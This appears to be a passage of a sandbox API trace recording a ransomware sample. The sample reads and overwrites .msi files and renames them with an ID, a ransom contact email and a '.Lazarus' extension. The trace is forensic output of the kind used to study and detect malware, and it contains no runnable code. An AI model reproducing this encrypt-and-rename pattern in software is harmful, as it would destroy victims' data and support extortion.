RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0064.407] GetLastError () returned 0x0 [0064.407] SetLastError (dwErrCode=0x0) [0064.407] AreFileApisANSI () returned 1 [0064.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0064.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67a20 [0064.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 41 [0064.407] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0064.407] GetFileType (hFile=0x410) returned 0x1 [0064.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0064.407] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0064.407] ReadFile (in: hFile=0x410, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0064.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0064.585] ReadFile (in: hFile=0x410, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0065.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0065.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0065.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0065.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e650 [0065.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0065.639] GetLastError () returned 0x0 [0065.639] SetLastError (dwErrCode=0x0) [0065.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0065.639] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0065.639] WriteFile (in: hFile=0x410, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0065.640] WriteFile (in: hFile=0x410, lpBuffer=0x8d648*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0065.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0065.640] CloseHandle (hObject=0x410) returned 1 [0065.854] AreFileApisANSI () returned 1 [0065.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0065.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0065.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 41 [0065.854] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0065.854] GetFileType (hFile=0x410) returned 0x1 [0065.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0065.854] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0065.854] ReadFile (in: hFile=0x410, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0065.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0065.855] ReadFile (in: hFile=0x410, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0065.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3b0 [0065.855] GetLastError () returned 0x0 [0065.855] SetLastError (dwErrCode=0x0) [0065.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0065.856] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0065.856] WriteFile (in: hFile=0x410, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0065.856] WriteFile (in: hFile=0x410, lpBuffer=0x8d648*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0065.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0065.856] CloseHandle (hObject=0x410) returned 1 [0066.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0066.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0066.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0066.001] AreFileApisANSI () returned 1 [0066.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0066.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 41 [0066.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0066.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xce) returned 0x73428 [0066.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x73428, cchWideChar=103 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 103 [0066.002] MoveFileExW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73428 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e650 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.013] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x4c741c3d, dwReserved1=0x4d115da2, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0066.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0066.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0066.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0066.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0066.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.014] AreFileApisANSI () returned 1 [0066.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi", lpUsedDefaultChar=0x0) returned 41 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0066.015] AreFileApisANSI () returned 1 [0066.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0066.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 41 [0066.015] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0066.015] GetFileType (hFile=0x410) returned 0x1 [0066.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0066.016] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0066.016] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0066.016] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0066.016] CloseHandle (hObject=0x410) returned 1 [0066.016] AreFileApisANSI () returned 1 [0066.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0066.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 41 [0066.016] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0066.017] GetFileType (hFile=0x410) returned 0x1 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0066.017] CloseHandle (hObject=0x410) returned 1 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.018] AreFileApisANSI () returned 1 [0066.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0066.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 41 [0066.018] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000)) returned 1 [0066.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0066.018] AreFileApisANSI () returned 1 [0066.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0066.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0066.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0066.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0066.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0066.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.018] GetLastError () returned 0x0 [0066.018] SetLastError (dwErrCode=0x0) [0066.018] AreFileApisANSI () returned 1 [0066.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67660 [0066.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 41 [0066.018] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0066.018] GetFileType (hFile=0x410) returned 0x1 [0066.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0066.019] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0066.019] ReadFile (in: hFile=0x410, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0066.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e650 [0066.021] ReadFile (in: hFile=0x410, lpBuffer=0x8e650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0066.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0066.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0066.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0066.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0066.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0066.022] GetLastError () returned 0x0 [0066.022] SetLastError (dwErrCode=0x0) [0066.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.022] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0066.023] WriteFile (in: hFile=0x410, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) 